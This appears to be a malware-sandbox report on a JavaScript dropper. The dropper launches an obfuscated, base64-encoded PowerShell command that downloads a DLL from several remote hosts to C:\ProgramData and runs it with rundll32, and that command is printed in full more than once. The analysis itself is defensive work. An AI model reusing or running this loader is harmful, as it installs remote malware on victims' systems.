Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 15, 2023, 9:57 a.m. | June 15, 2023, 9:59 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\EEmkwV3LNleuc.js
3068-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"
2276
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A" |
cmdline | powershell -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEA